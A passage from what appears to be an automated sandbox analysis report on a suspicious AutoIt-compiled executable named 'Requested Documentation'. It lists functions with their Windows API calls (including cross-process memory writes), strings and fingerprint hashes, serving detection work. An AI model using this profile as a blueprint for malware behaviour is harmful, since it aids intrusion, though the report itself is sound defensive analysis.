                                                                              • Instruction ID: 4cbcdbf76a1eb99f85dbe1a798a929288eb2767a21eb3baa78b5d1ef504162cd
                                                                              • Opcode Fuzzy Hash: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
                                                                              • Instruction Fuzzy Hash: A5F0CD3840460CDFDB25DFB6EC4C7583BA8AB42326F088225E429595F2DB368597EF50
                                                                              Function 00992CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
                                                                                • Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00987A51: _memmove.LIBCMT ref: 00987AAB
                                                                              • __swprintf.LIBCMT ref: 00992ECD
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00992D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 1943609520-557222456
                                                                              • Opcode ID: 5c2f1ce7347328efa7a07cd8c30106f61c39fd9f4457bcef9faff3e907cb620d
                                                                              • Instruction ID: acd8e1e9c042f1afe59d9b6f0ae9636934b1441f109d98d907a71a07edd6a179
                                                                              • Opcode Fuzzy Hash: 5c2f1ce7347328efa7a07cd8c30106f61c39fd9f4457bcef9faff3e907cb620d
                                                                              • Instruction Fuzzy Hash: F5913971508301AFCB14FF68C885E6FB7A8EFD6710F14491DF4969B2A1EA21ED44CB92
                                                                              Function 009EB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00984750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00984743,?,?,009837AE,?), ref: 00984770
                                                                              • CoInitialize.OLE32(00000000), ref: 009EB9BB
                                                                              • CoCreateInstance.OLE32(00A12D6C,00000000,00000001,00A12BDC,?), ref: 009EB9D4
                                                                              • CoUninitialize.OLE32 ref: 009EB9F1
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
                                                                              • Instruction ID: 9f47691cf3cfcf543fd8b9f044d5b0ca90e72dc1ae26eb5a10e9fd2aa46f0c92
                                                                              • Opcode Fuzzy Hash: d8fb700983b65a4f7f4ac98e1a6249741264930e35c2682309c7529e4260c9bf
                                                                              • Instruction Fuzzy Hash: 1FA169756043459FCB10EF15C884E6ABBE5FF89314F188998F8999B3A1CB31EC46CB91
                                                                              Function 009A501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 009A50AD
                                                                                • Part of subcall function 009B00F0: __87except.LIBCMT ref: 009B012B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
                                                                              • Instruction ID: fc31be608aab56beaae448dddb0bbd44dd44286ca0d828d886e3b485448c6211
                                                                              • Opcode Fuzzy Hash: 15d03cba356f70973839ec0ac31e236d8da54ef63276db93fe4d62afdd541211
                                                                              • Instruction Fuzzy Hash: A3515E61B0C60196DB15B718CA053FF3B98DFC2720F218D59E4D9862A9EE38CDC997C6
                                                                              Function 00996192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_memmove
                                                                              • String ID: ERCP
                                                                              • API String ID: 2532777613-1384759551
                                                                              • Opcode ID: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
                                                                              • Instruction ID: 4f498367e1884c6d3223724fce17d53bf8faef71091a03f552c9ce653843de7f
                                                                              • Opcode Fuzzy Hash: 871618a6e41eb48fc46eabd6b3d93c9e63d3d2c548333d8f07006e4152bb8d7a
                                                                              • Instruction Fuzzy Hash: DB518171900705DBDF24CF69C9427AAB7E9EF44314F20896EE45ADB291E774AA44CB80
                                                                              Function 009D97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D9296,?,?,00000034,00000800,?,00000034), ref: 009E14E6
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009D983F
                                                                                • Part of subcall function 009E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009E14B1
                                                                                • Part of subcall function 009E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 009E1409
                                                                                • Part of subcall function 009E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E1419
                                                                                • Part of subcall function 009E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009D925A,00000034,?,?,00001004,00000000,00000000), ref: 009E142F
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98AC
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009D98F9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
                                                                              • Instruction ID: 1acf338b67b55c643bed17a60b02842c1b549cd43d60d5384c662efda5be55d1
                                                                              • Opcode Fuzzy Hash: c617873a72bd8a01de15469c13911b86f59343ab6e24c05bfc408db01b8229ec
                                                                              • Instruction Fuzzy Hash: 03412E76900118BFDB11EFA4CC45FDEBBB8EB45700F004159F945B7291DA716E45CBA0
                                                                              Function 00A07946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A0F910,00000000,?,?,?,?), ref: 00A079DF
                                                                              • GetWindowLongW.USER32 ref: 00A079FC
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A07A0C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
                                                                              • Instruction ID: e2695eed9bbc9f06051e79fa36df4c2411f4df812e5929a3867765d259e8edb0
                                                                              • Opcode Fuzzy Hash: 4678739c50e55a57ce460d80b60e273d559ea131104f0dd0990e3f8a359befd4
                                                                              • Instruction Fuzzy Hash: 8631AD31A0460AAFDB219F78EC41BEB77A9FB45364F208725F875A32E0D731E9518B50
                                                                              Function 00A073D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A07461
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A07475
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A07499
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
                                                                              • Instruction ID: bb03afeb212698a245bd36115280ab38e59fc8866350573828fd2a5dba7d29dd
                                                                              • Opcode Fuzzy Hash: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
                                                                              • Instruction Fuzzy Hash: E121603250021DABDF11CFA4DC46FEE3B69EB48724F110214FE556B1D0DAB6BC519BA0
                                                                              Function 00A07B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A07C4A
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A07C58
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A07C5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
                                                                              • Instruction ID: a9998ac7d241b47ef9b47d777370273c425d8126cff13716a941c8932f0b1245
                                                                              • Opcode Fuzzy Hash: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
                                                                              • Instruction Fuzzy Hash: 442162B5A04109AFEB10DF64DCC1DAB37ECEF9A354B140459F9019B3A1CB72EC528BA0
                                                                              Function 00A06CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A06D3B
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A06D4B
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A06D70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
                                                                              • Instruction ID: d9c68a744dfb0825dd12ca3a9e959fcf82456928cbc9498c9b7de737d1e0e25a
                                                                              • Opcode Fuzzy Hash: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
                                                                              • Instruction Fuzzy Hash: 4B21623261011CBFEF158F54EC45FAB3BBAEF89764F118128F9459B1E0C671AC6297A0
                                                                              Function 00A0770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A07772
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A07787
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A07794
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
                                                                              • Instruction ID: b30f4e7946caddd5159796f77937e9d412589db54413b0b82c8cca6877be182a
                                                                              • Opcode Fuzzy Hash: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
                                                                              • Instruction Fuzzy Hash: 9E11C472644209BFEB209F65DC05F9B7769EF89B54F114528FA41A60D0D672A811CB20
                                                                              Function 00984C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00984BD0,?,00984DEF,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984C11
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984C23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
                                                                              • Instruction ID: 7d8c54d9b830aedc8c77a4eda8bba585960269b6547e3f92915e926165adb48c
                                                                              • Opcode Fuzzy Hash: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
                                                                              • Instruction Fuzzy Hash: B9D01231511727DFD730AFB5D908646B6D9FF09351B118C3A94C5E6650E6B0D481CB50
                                                                              Function 00984C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00984B83,?), ref: 00984C44
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984C56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
                                                                              • Instruction ID: d320a851f03a58dc3ece7f0df9cb70c101d434b56f82fe98f97371e00248effd
                                                                              • Opcode Fuzzy Hash: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
                                                                              • Instruction Fuzzy Hash: 0AD0C730900713DFCB30AF71D80824A72E8BF05340B128D3AA5D2E6AA0E670D880CB50
                                                                              Function 00A00DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00A01039), ref: 00A00DF5
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A00E07
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              • Opcode ID: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
                                                                              • Instruction ID: 2c8d36350d035910810fd053e6514d837de59de0816abd71aaca14a460592c74
                                                                              • Opcode Fuzzy Hash: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
                                                                              • Instruction Fuzzy Hash: 70D0177051072ADFD7219FB5D808B8776E5AF14352F118C3EA586E2590E6B4D8D1CA50
                                                                              Function 009F90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F8CF4,?,00A0F910), ref: 009F90EE
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9100
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              • Opcode ID: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
                                                                              • Instruction ID: 72601bcdad64b40ad636f515ff5fb4d646157a1f70e244bbbe6efc43efbad54e
                                                                              • Opcode Fuzzy Hash: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
                                                                              • Instruction Fuzzy Hash: 5BD0173461871BDFDB30DF71D81861676E8BF05351B128C3AA686E69A0EA74C881CB90
                                                                              Function 009C1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              • Opcode ID: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
                                                                              • Instruction ID: 357f54004ade7b4dda0a866a22aa62017405a0524baa301ff8a7b376e87a1d84
                                                                              • Opcode Fuzzy Hash: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
